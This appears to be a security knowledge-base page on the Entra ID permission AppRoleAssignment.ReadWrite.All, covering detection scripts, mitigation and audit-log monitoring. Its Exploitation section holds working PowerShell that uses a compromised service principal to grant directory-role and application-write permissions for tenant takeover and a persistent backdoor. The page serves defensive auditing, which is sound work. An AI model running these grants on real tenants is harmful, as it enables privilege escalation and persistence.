AZ_MG_APPROLEASSIGNMENT_READWRITE_ALL

Summary

FSProtect ACL Alias

Entra ID (Azure AD) Alias

AppRoleAssignment.ReadWrite.All

Affected Object Types

Service Principals, Applications

Exploitation Certainty

Certain

Graph Permission / Role

Application Permission: AppRoleAssignment.ReadWrite.All

Description

AZ_MG_APPROLEASSIGNMENT_READWRITE_ALL represents a Microsoft Graph application permission that grants read and write access to application role assignments in Microsoft Entra ID (Azure AD). This is one of the most dangerous permissions because it allows:

Grant application permissions to any service principal for any API (including Microsoft Graph)
Remove application permissions from any service principal
Assign app roles to users, groups, and service principals for any application
Manage consent grants for application permissions across the tenant

This permission is often abused for:

Privilege escalation: Granting dangerous permissions like RoleManagement.ReadWrite.Directory or Application.ReadWrite.All to an attacker-controlled service principal
Persistence: Creating service principals with high-privilege permissions that persist beyond user sessions
Lateral movement: Granting permissions to access other APIs and applications in the tenant
Defense evasion: Removing permissions from security monitoring applications

Important: This is an application permission that requires admin consent and is granted to service principals, not individual users. Once granted, the service principal can perform these actions without additional user context.

Critical Warning: With AppRoleAssignment.ReadWrite.All, an application can grant itself or any other service principal any Microsoft Graph permission, including RoleManagement.ReadWrite.Directory (which can then assign Global Administrator). This creates a path to complete tenant takeover.

Key Difference from Application.ReadWrite.All: While Application.ReadWrite.All allows creating and modifying applications and service principals, AppRoleAssignment.ReadWrite.All specifically controls which permissions are granted to those applications. Both are dangerous, but AppRoleAssignment.ReadWrite.All is the key to granting dangerous permissions.

Identification

PowerShell

Find Service Principals with AppRoleAssignment.ReadWrite.All

Connect-AzAccount

$permissionId = "06b708a9-e830-4db3-a914-8e69da51d44f"  # AppRoleAssignment.ReadWrite.All GUID

Get all app role assignments across the tenant

$uri = "https://graph.microsoft.com/v1.0/servicePrincipals?`$expand=appRoleAssignments"
$allServicePrincipals = @()

while ($uri) {
    $response = Invoke-AzRestMethod -Uri $uri -Method GET
    $data = $response.Content | ConvertFrom-Json
    $allServicePrincipals += $data.value
    $uri = $data.'@odata.nextLink'
}

Write-Host "Retrieved $($allServicePrincipals.Count) service principals"

Filter for those with AppRoleAssignment.ReadWrite.All and export results

# Step 2: Filter for those with AppRoleAssignment.ReadWrite.All
$results = @()

foreach ($sp in $allServicePrincipals) {
    $matchingAssignments = $sp.appRoleAssignments | Where-Object { $_.appRoleId -eq $permissionId }
    
    foreach ($assignment in $matchingAssignments) {
        $results += [PSCustomObject]@{
            ServicePrincipalName = $sp.displayName
            ServicePrincipalId   = $sp.id
            AppId                = $sp.appId
            PermissionName       = "AppRoleAssignment.ReadWrite.All"
            PermissionId         = $permissionId
            ResourceId           = $assignment.resourceId
            AssignedDateTime     = $assignment.createdDateTime
        }
    }
}

Write-Host "`nFound $($results.Count) service principals with AppRoleAssignment.ReadWrite.All"
$results | Export-Csv -Path ".\AppRoleAssignmentReadWriteAll_ServicePrincipals.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

Exploitation

An attacker with access to a service principal that has AppRoleAssignment.ReadWrite.All can grant any Microsoft Graph permission to any service principal, enabling privilege escalation.

Grant RoleManagement.ReadWrite.Directory to Attacker Service Principal

# Authenticate as the compromised service principal
$tenantId = "<tenant-id>"
$appId = "<compromised-app-id>"
$clientSecret = "<client-secret>"

$secureSecret = ConvertTo-SecureString $clientSecret -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential($appId, $secureSecret)
Connect-AzAccount -ServicePrincipal -Credential $credential -Tenant $tenantId

# Microsoft Graph service principal object ID (resource we're granting permissions from)
# To find this: Entra ID -> Enterprise applications -> Filter: Microsoft Applications -> Search "Microsoft Graph" -> Copy Object ID
$msgraphId = "<msgraph-sp-object-id>"

# Target service principal object ID (the one receiving the permission)
# To find this: Entra ID -> Enterprise applications -> Search your app -> Copy Object ID
$targetSpId = "<target-sp-object-id>"

# RoleManagement.ReadWrite.Directory permission ID
$roleManagementPermissionId = "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8"

# Grant the permission
$uri = "https://graph.microsoft.com/v1.0/servicePrincipals/$targetSpId/appRoleAssignments"
$body = @{
    principalId = $targetSpId
    resourceId  = $msgraphId
    appRoleId   = $roleManagementPermissionId
} | ConvertTo-Json

$response = Invoke-AzRestMethod -Uri $uri -Method POST -Payload $body
Write-Output "Permission grant status: $($response.StatusCode)"

Grant Application.ReadWrite.All to Create Persistent Backdoor

# Application.ReadWrite.All permission ID
$appReadWritePermissionId = "1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9"

# Microsoft Graph service principal object ID (resource we're granting permissions from)
# To find this: Entra ID -> Enterprise applications -> Filter: Microsoft Applications -> Search "Microsoft Graph" -> Copy Object ID
$targetSpId = "<target-sp-object-id>"

# Target service principal object ID (the one receiving the permission)
# To find this: Entra ID -> Enterprise applications -> Search your app -> Copy Object ID
$msgraphId = "<msgraph-sp-object-id>"

# Grant Application.ReadWrite.All
$uri = "https://graph.microsoft.com/v1.0/servicePrincipals/$targetSpId/appRoleAssignments"
$body = @{
    principalId = $targetSpId
    resourceId  = $msgraphId
    appRoleId   = $appReadWritePermissionId
} | ConvertTo-Json

$response = Invoke-AzRestMethod -Uri $uri -Method POST -Payload $body
Write-Output "Permission grant status: $($response.StatusCode)"

Mitigation

Audit all service principals with AppRoleAssignment.ReadWrite.All and remove unnecessary grants.
- Go to Microsoft Entra ID -> App registrations -> select the application -> API permissions.
- Remove the AppRoleAssignment.ReadWrite.All permission if not required.
Apply least privilege: This permission should almost never be granted to applications.
- Use more specific permissions when possible.
- Use delegated permissions with user context when appropriate.
Monitor permission grant changes:
- Enable Azure AD audit logs and alert on app role assignment changes.
- Configure Microsoft Defender for Cloud Apps to detect suspicious permission modifications.
Protect the permission grant process:
- Require multiple approvals for granting this permission.
- Document business justification for any application requiring this permission.
Implement Access Reviews for applications with high-privilege permissions:
- Go to Identity Governance -> Access Reviews -> New access review.
- Review applications with sensitive Graph permissions regularly.
Use Conditional Access to restrict service principal access:
- Limit the locations and conditions under which service principals can authenticate.
- Consider blocking service principals with this permission from non-trusted locations.

Detection

Detect permission grants and suspicious app role assignment activity in Audit logs.

Go to Microsoft Entra ID -> Audit logs.
Filter by activities:
- Add app role assignment to service principal (permission granted to SP)
- Remove app role assignment from service principal (permission removed from SP)
- Add app role assignment grant to user (app role assigned to user)

Monitor for suspicious patterns:

Permission grants made by service principals (especially dangerous permissions like RoleManagement.ReadWrite.Directory)
Bulk permission changes
Permission grants outside of change management windows
Removal of permissions from security or monitoring applications
Self-granting of permissions by service principals

References

PreviousAZ_MG_APPLICATION_READWRITE_ALL NextAZ_MG_DANGEROUS_PERMISSION

Last updated 6 days ago

Was this helpful?

hashtagSummary

hashtagDescription

hashtagIdentification

hashtagPowerShell

hashtagFind Service Principals with AppRoleAssignment.ReadWrite.All

hashtagGet all app role assignments across the tenant

hashtagFilter for those with AppRoleAssignment.ReadWrite.All and export results

hashtagExploitation

hashtagGrant RoleManagement.ReadWrite.Directory to Attacker Service Principal

hashtagGrant Application.ReadWrite.All to Create Persistent Backdoor

hashtagMitigation

hashtagDetection

hashtagReferences